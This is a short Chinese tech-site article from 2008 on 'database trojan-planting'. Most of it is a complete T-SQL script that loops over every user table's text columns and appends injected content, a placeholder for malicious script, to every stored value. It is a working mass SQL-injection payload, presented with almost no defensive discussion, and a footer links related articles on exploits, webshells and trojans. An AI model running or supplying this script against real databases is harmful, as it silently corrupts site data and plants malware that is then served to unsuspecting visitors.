最近比較流行的數(shù)據(jù)庫掛馬
更新時(shí)間:2008年05月07日 20:01:29 作者:
以前說過的趨勢掛馬事件,MS這個(gè)掛馬方法已經(jīng)流行了很久,從去年就大規(guī)模開始了,在網(wǎng)上可以搜到很多痕跡。
SQL語句如下:
用游標(biāo)遍歷所有表里如下數(shù)據(jù)類型的字段,然后UPDATE掛馬。(全部是允許寫入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=
rtrim(convert(varchar,['+@C+']))+
”掛馬內(nèi)容”')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
相關(guān)文章
用QQ文件共享漏洞徹底攻破Windows2003的堅(jiān)固堡壘
用QQ文件共享漏洞徹底攻破Windows2003的堅(jiān)固堡壘...2007-01-01
木馬靜態(tài)變動(dòng)態(tài) DLL木馬程序大揭秘
木馬靜態(tài)變動(dòng)態(tài) DLL木馬程序大揭秘...2007-01-01
獲得leadbbs論壇站webshell后進(jìn)后臺(tái)最簡便之法
獲得leadbbs論壇站webshell后進(jìn)后臺(tái)最簡便之法...2007-01-01
揭露88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)漏洞
88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了2008-05-05
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞...2007-01-01

